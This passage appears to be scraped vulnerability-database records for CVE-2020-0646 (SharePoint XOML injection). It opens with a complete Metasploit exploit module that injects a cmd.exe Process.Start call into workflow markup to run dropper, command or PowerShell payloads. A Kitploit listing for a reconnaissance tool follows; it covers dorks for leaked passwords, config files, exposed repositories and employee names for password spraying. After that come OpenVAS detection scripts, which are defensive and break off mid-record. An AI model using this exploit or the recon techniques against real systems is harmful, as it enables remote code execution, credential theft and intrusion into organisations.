Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n\r\nclass MetasploitModule < Msf::Exploit::Remote\r\n\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n include Msf::Exploit::CmdStager\r\n include Msf::Exploit::Powershell\r\n include Msf::Exploit::Remote::AutoCheck\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'SharePoint Workflows XOML Injection',\r\n 'Description' => %q{\r\n This module exploits a vulnerability within SharePoint and its .NET backend\r\n that allows an attacker to 
execute commands using specially crafted XOML data\r\n sent to SharePoint via the Workflows functionality.\r\n },\r\n 'Author' => [\r\n 'Spencer McIntyre',\r\n 'Soroush Dalili'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'References' => [\r\n ['CVE', '2020-0646'],\r\n ['URL', 'https://www.mdsec.co.uk/2020/01/code-injection-in-workflows-leading-to-sharepoint-rce-cve-2020-0646/']\r\n ],\r\n 'Platform' => 'win',\r\n 'Targets' => [\r\n [ 'Windows EXE Dropper', { 'Arch' => [ARCH_X86, ARCH_X64], 'Type' => :windows_dropper } ],\r\n [ 'Windows Command', { 'Arch' => ARCH_CMD, 'Type' => :windows_command, 'Space' => 3000 } ],\r\n [ 'Windows Powershell',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Type' => :windows_powershell\r\n ]\r\n ],\r\n 'DefaultOptions' => {\r\n 'RPORT' => 443,\r\n 'SSL' => true\r\n },\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => '2020-03-02',\r\n 'Notes' =>\r\n {\r\n 'Stability' => [CRASH_SAFE,],\r\n 'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS],\r\n 'Reliability' => [REPEATABLE_SESSION],\r\n },\r\n 'Privileged' => true\r\n ))\r\n\r\n register_options([\r\n OptString.new('TARGETURI', [ true, 'The base path to the SharePoint application', '/' ]),\r\n OptString.new('DOMAIN', [ true, 'The domain to use for Windows authentication', 'WORKGROUP' ]),\r\n OptString.new('USERNAME', [ true, 'Username to authenticate as', '' ]),\r\n OptString.new('PASSWORD', [ true, 'The password to authenticate with' ])\r\n ])\r\n end\r\n\r\n def check\r\n res = execute_command(\"echo #{Rex::Text.rand_text_alphanumeric(4 + rand(8))}\")\r\n return CheckCode::Unknown('Did not receive an HTTP 200 OK response') unless res&.code == 200\r\n\r\n compiler_errors = extract_compiler_errors(res)\r\n return CheckCode::Unknown('No compiler errors were reported') unless compiler_errors&.length > 0\r\n\r\n # once patched you get a specific compiler error message about the type name\r\n return CheckCode::Safe if compiler_errors[0].to_s =~ /is not a valid language-independent type 
name/\r\n\r\n CheckCode::Vulnerable\r\n end\r\n\r\n def extract_compiler_errors(res)\r\n return nil unless res&.code == 200\r\n\r\n xml_doc = res.get_xml_document\r\n result = xml_doc.search('//*[local-name()=\\'ValidateWorkflowMarkupAndCreateSupportObjectsResult\\']').text\r\n return nil if result.length == 0\r\n\r\n xml_result = Nokogiri::XML(result)\r\n xml_result.xpath('//CompilerError/@Text')\r\n end\r\n\r\n def exploit\r\n # NOTE: Automatic check is implemented by the AutoCheck mixin\r\n super\r\n\r\n case target['Type']\r\n when :windows_command\r\n execute_command(payload.encoded)\r\n when :windows_dropper\r\n cmd_target = targets.select {|target| target['Type'] == :windows_command}.first\r\n execute_cmdstager({linemax: cmd_target.opts['Space']})\r\n when :windows_powershell\r\n execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))\r\n end\r\n end\r\n\r\n def escape_command(cmd)\r\n # a bunch of characters have to be escaped, so use a whitelist of those that are allowed and escape the rest as unicode\r\n cmd.gsub(/([^a-zA-Z0-9 $:;\\-\\.=\\[\\]\\{\\}\\(\\)])/) { |x| \"\\\\u%.4x\" %x.unpack('C*')[0] }\r\n end\r\n\r\n def execute_command(cmd, opts = {})\r\n xoml_data = <<-EOS\r\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n<soap:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <soap:Body>\r\n <ValidateWorkflowMarkupAndCreateSupportObjects xmlns=\"http://microsoft.com/sharepoint/webpartpages\">\r\n <workflowMarkupText>\r\n <![CDATA[\r\n <SequentialWorkflowActivity x:Class=\"MyWorkflow\" x:Name=\"foobar\" xmlns:x=\"http://schemas.microsoft.com/winfx/2006/xaml\" xmlns=\"http://schemas.microsoft.com/winfx/2006/xaml/workflow\">\r\n <CallExternalMethodActivity x:Name=\"foo\" MethodName='test1' InterfaceType='System.String);}Object/**/test2=System.Diagnostics.Process.Start(\"cmd.exe\", \"/c 
#{escape_command(cmd)}\");private/**/void/**/foobar(){//' />\r\n </SequentialWorkflowActivity>\r\n ]]>\r\n </workflowMarkupText>\r\n <rulesText></rulesText>\r\n <configBlob></configBlob>\r\n <flag>2</flag>\r\n </ValidateWorkflowMarkupAndCreateSupportObjects>\r\n </soap:Body>\r\n</soap:Envelope>\r\n EOS\r\n\r\n res = send_request_cgi({\r\n 'method' => 'POST',\r\n 'uri' => normalize_uri(target_uri.path, '_vti_bin', 'webpartpages.asmx'),\r\n 'ctype' => 'text/xml; charset=utf-8',\r\n 'data' => xoml_data,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n unless res&.code == 200\r\n print_error('Non-200 HTTP response received while trying to execute the command')\r\n end\r\n\r\n res\r\n end\r\nend\n\n# 0day.today [2020-03-26] #", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://0day.today/exploit/34152"}], "kitploit": [{"lastseen": "2021-01-19T09:37:39", "bulletinFamily": "tools", "cvelist": ["CVE-2020-0646"], "description": "[  ](<https://1.bp.blogspot.com/-1de0aBPNIWk/YAUWk6HkngI/AAAAAAAAVBA/s_ZSe7IlI7IkK-BtzxPMSmMHzAoV1_H6QCNcBGAsYHQ/s1200/BigBountyRecon_1.png>)\n\n \n\n\nBigBountyRecon tool utilises 58 different techniques using various Google dorks and open source tools to expedite the process of initial reconnaissance on the target organisation. Reconnaissance is the most important step in any [ penetration testing ](<https://www.kitploit.com/search/label/Penetration%20Testing> \"penetration testing\" ) or a bug hunting process. It provides an attacker with some preliminary knowledge on the target organisation. Furthermore, it will be useful to gain insights into what controls are in place as well as some rough estimations on the security maturity level of the target organisation. \n\nThis tool can be used in addition to your usual approach for bug hunting. 
The idea is to quickly check and gather information about your target organisation without investing time and remembering these syntaxes. In addition, it can help you define an approach towards finding some quick wins on the target. \n\nAny suggestions or ideas for this tool are welcome - just tweet me on [ @ManiarViral ](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n\n\n** Techniques ** \n\n\n 1. Directory Listing: Finding open directories using Google Dork on your target organisation helps one to understand the directory structure on the webserver. It may reveal [ sensitive information ](<https://www.kitploit.com/search/label/Sensitive%20Information> \"sensitive information\" ) or it may lead to information disclosure. \n\n 2. Configuration Files: Often times configuration files contains sensitive information such as hardcoded passwords, sensitive drive locations or API tokens which can help you gain privilege access to the internal resources. \n\n 3. Database Files: Database Files are data files that are used to store the contents of the database in a structured format into a file in separate tables and fields. Depending on the nature of the web application these files could provide access to sensitive information. \n\n 4. WordPress: WordPress is an open-source CMS written in PHP. WordPress has thousands of plugins to build, customise and enhance the websites. There are numerous [ vulnerabilities ](<https://www.kitploit.com/search/label/vulnerabilities> \"vulnerabilities\" ) in these plugins. Finding WordPress related \n\n 5. Log Files: Log files sometimes provide detailed information of the users' activities in a particular application. These files are good to look at session cookies or other types of tokens. \n\n 6. Backup and Old Files: Backup files are original copies of the critical systems. These provide access to PII or access to sensitive records. \n\n 7. 
Login Pages: It is extremely important to identify login pages of your target organisation to perform bruteforce attempts or trying [ default credentials ](<https://www.kitploit.com/search/label/Default%20Credentials> \"default credentials\" ) to gain further access to organisation resources. \n\n 8. SQL Errors: SQL errors leak sensitive information about the backend systems. This can help one to perform enumeration on the database types and see if the application is vulnerable to input validation related attacks such as SQL Injection. \n\n 9. Apache Config Files: Apache HTTP Server is configured by placing directives in plain text configuration files. The main configuration file is usually called httpd.conf. In addition, other configuration files may be added using the Include directive, and wildcards can be used to include many configuration files. Any directive may be placed in any of these configuration files. Depending on the entries in these config files it may reveal database connection strings, usernames and passwords, the internal workings, used and referenced libraries and business logic of application. \n\n 10. Robots.txt File: Robots.txt file instructs web robots how to crawl pages on their website. Depending on the content of the file, an attacker might discover hidden directories and files. \n\n 11. DomainEye: DomainEye is a domain/host investigation tool that has the largest domain databases. They provide services such as reverse Whois, reverse IP lookup, as well as reverse NS and MX. \n\n 12. Publicly Exposed Documents: Such documents can be used to extract metadata information. \n\n 13. phpinfo(): Exposing phpinfo() on its own isn't necessarily a risk, but in combination with other vulnerabilities could lead to your site becoming compromised. Additionally, module versions could make an attacker's life easier when targeting an application using newly discovered exploits. \n\n 14. 
Finding Backdoors: This can help one to identify website defacements or server hijacking related issues. By exploiting the open redirect vulnerability on the trusted web application, the attacker can redirect victims to a phishing page. \n\n 15. Install/Setup Files: Such files allow an attacker to perform enumeration on the target organisation. Information gathered using these files can help discover version details which can then be used to perform the targeted exploit. \n\n 16. Open Redirects: With these, we look at various known parameters vulnerable to open redirect related issues. \n\n 17. Apache Struts RCE: Successfully exploiting an RCE vulnerability could allow the attacker to run arbitrary programs. Here, we are looking for files with extensions of \".action\" or \".do\". \n\n 18. 3rd Party Exposure: Here we are looking for exposure of information on third party sites such as Codebeautify, Codeshare and Codepen. \n\n 19. Check Security Headers: Identify quickly if the target site is using security related headers in the server response. \n\n 20. GitLab: Quickly look for sensitive information on the GitLab. \n\n 21. Find Pastebin Entries: Shows you the results related to the target organisation on the Pastebin site. This could be passwords or any other sensitive information related to the target organisation. \n\n 22. Employees on LINKEDIN: Identifying employee names on LinkedIn can help you build a username list when it comes to password spraying attack. \n\n 23. .HTACCESS / Sensitive Files: Look for sensitive file exposure. This may indicate a server misconfiguration. \n\n 24. Find Subdomains: Subdomain helps you expand the attack surface on the target organisation. There are numerous tools available to automate the process of subdomain enumeration. \n\n 25. Find Sub-Subdomains: Identify sub-sub domains on the target organisation using Google Dork. \n\n 26. 
Find WordPress related exposure: WordPress related exposure helps you gain access to sensitive files and folders. \n\n 27. BitBucket & Atlassian: Source code leakage, hardcoded credentials and access to cloud infrastructure. \n\n 28. PassiveTotal: PassiveTotal is a great tool to perform threat investigation. Using BigBountyRecon we will use PassiveTotal to identify subdomains on the target information. \n\n 29. Stackoverflow: Source code exposure or any technology-specific questions mentioned on the Stackoverflow. \n\n 30. Find WordPress related exposure using Wayback Machine: Look for archived WordPress files using WaybackMachine. \n\n 31. GitHub: Quickly look for sensitive information on the GitHub. \n\n 32. OpenBugBounty: Look for publicly exposed security issues on the OpenBugBounty website. \n\n 33. Reddit: Information about the particular organisation on the Reddit platform. \n\n 34. Crossdomain.xml: Look for misconfigured crossdomain.xml files on the target organisation. \n\n 35. ThreatCrowd: Search engine for threats, however, we are going to use this to identify additional sub-domains. \n\n 36. .git Folder: Source code exposure. It's possible to download the entire repository content if accessible. \n\n 37. YouTube: Look for any recent news on YouTube. \n\n 38. Digitalocean Spaces: Spaces is an S3-compatible object storage service that lets you store and serve large amounts of data. We will look for any data exposures. \n\n 39. .SWF File (Google): Flash is dead. We are going to use Google Dorks to look for older versions of flash .swf's which contain vulnerabilities. \n\n 40. .SWF File (Yandex): Flash is dead. We are going to use Yandex to look for older versions of flash .swf's which contain vulnerabilities. \n\n 41. .SWF File (Wayback Machine): Flash is dead. We are going to use WaybackMachine to look for older versions of flash .swf's which contain vulnerabilities. \n\n 42. Wayback Machine: Look for archived files to access old files. \n\n 43. 
Reverse IP Lookup: Reverse IP Lookup lets you discover all the domain names hosted on any given IP address. This will help you to explore the attack surface for a target organisation. \n\n 44. Traefik: Look for an open-source Edge Router for an unauthenticated interface which exposes internal services. \n\n 45. Cloud Storage and Buckets: Google CSE for various cloud storages - aws, digitalocean, backblaze, wasabi, rackspace, dropbox, ibm, azure, dreamhost, linode, gcp, box, mailru \n\n 46. s3 Buckets: Open s3 buckets. \n\n 47. PublicWWW: Source code search engine indexes the content of over 200 million web sites and provides a query interface that lets the caller find any alphanumeric snippet, signature or keyword in the web pages \u2018HTML\u2019, \u2018JavaScript\u2019 and \u2018CSS\u2019 style sheet code. \n\n 48. Censys (IPv4, Domains & Certs): Search engine for finding internet devices. We will use this to look for additional sub-domains using various endpoints on Censys. \n\n 49. Shodan: Search engine for Internet-connected devices \n\n 50. SharePoint RCE: Look for CVE-2020-0646 SharePoint RCE related endpoint. \n\n 51. API Endpoints: Find WSDL files. \n\n 52. Gist Searches: Quickly look for sensitive information on the Gist pastes. \n\n 53. CT Logs: [ Certificate Transparency ](<https://www.kitploit.com/search/label/Certificate%20Transparency> \"Certificate Transparency\" ) (CT) is an Internet security standard and open-source framework for monitoring and auditing digital certificates. We will use to look for additional sub-domains for a targeted organisation. \n\n 54. Password Leak: Look for plaintext passwords of internal employees exposed in various leaks. \n\n 55. What CMS: Identify the version and type of CMS used by a target organisation for targeted enumeration and exploit research. 
\n\n \n** Screenshots ** \n\n\nSearch for plaintext passwords for a target organisation: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-a7bDrZPQamY/YAUWr80XooI/AAAAAAAAVBE/uxMttZ7hKTMMyMSAS_EHEeMjZHgMbeFawCNcBGAsYHQ/s1849/BigBountyRecon_2.png>)\n\n \n\n\nLooking for subdomains and other interesting information on the target organisation: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-dNYvaIk2FvU/YAUWwfzC2hI/AAAAAAAAVBI/_1VYpz-7eDkXb6ttrQxG6kA1eDHGUeJZACNcBGAsYHQ/s1687/BigBountyRecon_3.png>)\n\nFinding Apache Struts related assets: \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-NP0ZVmNjuhc/YAUWziDsUZI/AAAAAAAAVBM/iL8sdo6Ymysr6Q0wO5AOmDIsTQoQvjIWACNcBGAsYHQ/s1610/BigBountyRecon_4.png>)\n\n \n\n\nVerifying if the URL contains extenstion of \".do\": \n\n \n\n\n[  ](<https://1.bp.blogspot.com/-B96MKuKMQEI/YAUW2gPCWCI/AAAAAAAAVBU/J07KZmZOJOssCl7rNyZeyiOKQgWyaySDgCNcBGAsYHQ/s1633/BigBountyRecon_5.png>)\n\n \n\n\n** How to use this tool? ** \n\n\nStep1: Download the file from Release section: [ https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe ](<https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe> \"https://github.com/Viralmaniar/BigBountyRecon/releases/download/v0.1/BigBountyRecon.exe\" )\n\nStep2: Run the EXE file \n\nStep3: Enter the target domain \n\nStep4: Click on different buttons in the tool to find information \n\nStep5: In case of Google Captcha simply click on the puzzle and move ahead \n\n \n** Questions? 
** \n\n\nTwitter: [ https://twitter.com/maniarviral ](<https://twitter.com/maniarviral> \"https://twitter.com/maniarviral\" ) \nLinkedIn: [ https://au.linkedin.com/in/viralmaniar ](<https://au.linkedin.com/in/viralmaniar> \"https://au.linkedin.com/in/viralmaniar\" )\n\n \n** Dorking operators across Google, DuckDuckGo, Yahoo and Bing ** \n\n\nTable obtained from: [ https://exposingtheinvisible.org/guides/google-dorking/ ](<https://exposingtheinvisible.org/guides/google-dorking/> \"https://exposingtheinvisible.org/guides/google-dorking/\" )\n\nHere is a table with possible dorks for various search engines. \n\nDork | Description | Google | DuckDuckGo | Yahoo | Bing \n---|---|---|---|---|--- \ncache:[url] | Shows the version of the web page from the search engine\u2019s cache. | \u2713 | | | \nrelated:[url] | Finds web pages that are similar to the specified web page. | \u2713 | | | \ninfo:[url] | Presents some information that Google has about a web page, including similar pages, the cached version of the page, and sites linking to the page. | \u2713 | | | \nsite:[url] | Finds pages only within a particular domain and all its subdomains. | \u2713 | \u2713 | \u2713 | \u2713 \nintitle:[text] or allintitle:[text] | Finds pages that include a specific keyword as part of the indexed title tag. You must include a space between the colon and the query for the operator to work in Bing. | \u2713 | \u2713 | \u2713 | \u2713 \nallinurl:[text] | Finds pages that include a specific keyword as part of their indexed URLs. | | \u2713 | | \nmeta:[text] | Finds pages that contain the specific keyword in the meta tags. | | | | \nfiletype:[file extension] | Searches for specific file types. | \u2713 | \u2713 | | \u2713 \nintext:[text], allintext:[text], inbody:[text] | Searches text of page. For Bing and Yahoo the query is inbody:[text]. For DuckDuckGo the query is intext:[text]. For Google either intext:[text] or allintext:[text] can be used. 
| \u2713 | \u2713 | | \u2713 \ninanchor:[text] | Search link anchor text | \u2713 | | | \nlocation:[iso code] or loc:[iso code], region:[region code] | Search for specific region. For Bing use location:[iso code] or loc:[iso code] and for DuckDuckGo use region:[iso code].An iso location code is a short code for a country for example, Egypt is eg and USA is us. [ https://en.wikipedia.org/wiki/ISO_3166-1 ](<https://en.wikipedia.org/wiki/ISO_3166-1> \"https://en.wikipedia.org/wiki/ISO_3166-1\" ) | | \u2713 | | \u2713 \ncontains:[text] | Identifies sites that contain links to filetypes specified (i.e. contains:pdf) | | | | \u2713 \naltloc:[iso code] | Searches for location in addition to one specified by language of site (i.e. pt-us or en-us) | | | | \u2713 \nfeed:[feed type, i.e. rss] | Find RSS feed related to search term | | \u2713 | \u2713 | \u2713 \nhasfeed:[url] | Finds webpages that contain both the term or terms for which you are querying and one or more RSS or Atom feeds. | \u2713 | \u2713 | | \u2713 \nip:[ip address] | Find sites hosted by a specific ip address | | | \u2713 | \u2713 \nlanguage:[language code] | Returns websites that match the search term in a specified language | | \u2713 | \u2713 | \nbook:[title] | Searches for book titles related to keywords | \u2713 | | | \nmaps:[location] | Searches for maps related to keywords | \u2713 | | | \nlinkfromdomain:[url] | Shows websites whose links are mentioned in the specified url (with errors) | | | | \u2713 \n \n** Contribution **\n\nAny suggestions or ideas for this tool are welcome - just tweet me on [ @ManiarViral ](<https://twitter.com/maniarviral> \"@ManiarViral\" )\n\n \n \n\n\n** [ Download BigBountyRecon ](<https://github.com/Viralmaniar/BigBountyRecon> \"Download BigBountyRecon\" ) **\n", "edition": 1, "modified": "2021-01-18T20:30:02", "published": "2021-01-18T20:30:02", "id": "KITPLOIT:4480301396595295532", "href": "http://www.kitploit.com/2021/01/bigbountyrecon-this-tool-utilises-58.html", 
"title": "BigBountyRecon - This Tool Utilises 58 Different Techniques To Expediate The Process Of Intial Reconnaissance On The Target Organisation", "type": "kitploit", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2020-06-05T15:41:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing an important security\n update according to Microsoft KB4535101", "modified": "2020-06-04T00:00:00", "published": "2020-01-15T00:00:00", "id": "OPENVAS:1361412562310815898", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310815898", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535101", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.815898\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-15 10:11:12 +0530 (Wed, 15 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535101\");\n\n script_tag(name:\"summary\", value:\"This host is missing an important security\n update according to Microsoft KB4535101\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.7.2 and 4.8 on Microsoft Windows 10 version 1809 and Microsoft Windows Server 2019.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4535101\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n\nif(hotfix_check_sp(win10:1, win10x64:1, win2019:1) <= 0){\n exit(0);\n}\n\nsysPath = smb_get_system32root();\nif(!sysPath ){\n exit(0);\n}\n\nedgeVer = fetch_file_version(sysPath:sysPath, file_name:\"edgehtml.dll\");\nif(!edgeVer){\n exit(0);\n}\n\nif(edgeVer =~ \"^11\\.0\\.17763\")\n{\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\.NETFramework\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\ASP.NET\")){\n if(!registry_key_exists(key:\"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\")){\n exit(0);\n }\n }\n }\n\n key_list = make_list(\"SOFTWARE\\Microsoft\\.NETFramework\\\", \"SOFTWARE\\Microsoft\\ASP.NET\\\", \"SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\\");\n\n foreach key(key_list)\n {\n if(\".NETFramework\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n NetPath = registry_get_sz(key:key + item, item:\"InstallRoot\");\n if(NetPath && \"\\Microsoft.NET\\Framework\" >< NetPath)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = NetPath + item;\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4535101\n ## https://support.microsoft.com/en-us/help/4532947\n ## 
https://support.microsoft.com/en-us/help/4532937\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9042\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9042\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n }\n\n if((!vulnerable_range) && \"ASP.NET\" >< key)\n {\n foreach item (registry_enum_keys(key:key))\n {\n dotPath = registry_get_sz(key:key + item, item:\"Path\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## https://support.microsoft.com/en-us/help/4535101\n ## https://support.microsoft.com/en-us/help/4532947\n ## https://support.microsoft.com/en-us/help/4532937\n if(version_in_range(version:dllVer, test_version:\"3.0\", test_version2:\"3.0.4203.9042\"))\n {\n vulnerable_range = \"3.0 - 3.0.4203.9042\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n break;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n break;\n }\n }\n }\n }\n }\n\n ## For versions greater than 4.5 (https://docs.microsoft.com/en-us/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed#net_b)\n if((!vulnerable_range) && \"NET Framework Setup\" >< key)\n {\n dotPath = registry_get_sz(key:key, item:\"InstallPath\");\n if(dotPath && \"\\Microsoft.NET\\Framework\" >< dotPath)\n {\n dllVer = fetch_file_version(sysPath:dotPath, file_name:\"System.workflow.runtime.dll\");\n if(dllVer)\n {\n ## 
https://support.microsoft.com/en-us/help/4532936\n if(version_in_range(version:dllVer, test_version:\"4.8\", test_version2:\"4.8.4109\"))\n {\n vulnerable_range = \"4.8 - 4.8.4109\" ;\n }\n else if(version_in_range(version:dllVer, test_version:\"4.7\", test_version2:\"4.7.3569\"))\n {\n vulnerable_range = \"4.7 - 4.7.3569\" ;\n }\n }\n }\n }\n\n if(vulnerable_range)\n {\n report = report_fixed_ver(file_checked:dotPath + \"System.workflow.runtime.dll\",\n file_version:dllVer, vulnerable_range:vulnerable_range);\n security_message(data:report);\n exit(0);\n }\n }\n}\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-06-05T15:41:56", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0646", "CVE-2020-0606", "CVE-2020-0605"], "description": "This host is missing a critical security\n update according to Microsoft KB4535104", "modified": "2020-06-04T00:00:00", "published": "2020-01-16T00:00:00", "id": "OPENVAS:1361412562310816553", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310816553", "type": "openvas", "title": "Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535104)", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Some text descriptions might be excerpted from (a) referenced\n# source(s), and are Copyright (C) by the respective right holder(s).\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.816553\");\n script_version(\"2020-06-04T08:47:11+0000\");\n script_cve_id(\"CVE-2020-0646\", \"CVE-2020-0605\", \"CVE-2020-0606\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-06-04 08:47:11 +0000 (Thu, 04 Jun 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-16 11:32:54 +0530 (Thu, 16 Jan 2020)\");\n script_name(\"Microsoft .NET Framework Multiple RCE Vulnerabilities (KB4535104)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4535104\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to,\n\n - Microsoft .NET Framework fails to check the source markup of a file.\n\n - Microsoft .NET Framework fails to validate input properly.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker\n to run arbitrary code in the context of the current user. If the current user\n is logged on with administrative user rights, an attacker could take control of\n the affected system.\");\n\n script_tag(name:\"affected\", value:\"Microsoft .NET Framework 3.5, 4.5.2, 4.6, 4.6.1, 4.6.2, 4.7, 4.7.1, 4.7.2, 4.8 for Microsoft Windows 8.1 and Microsoft Windows Server 2012 R2.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. 
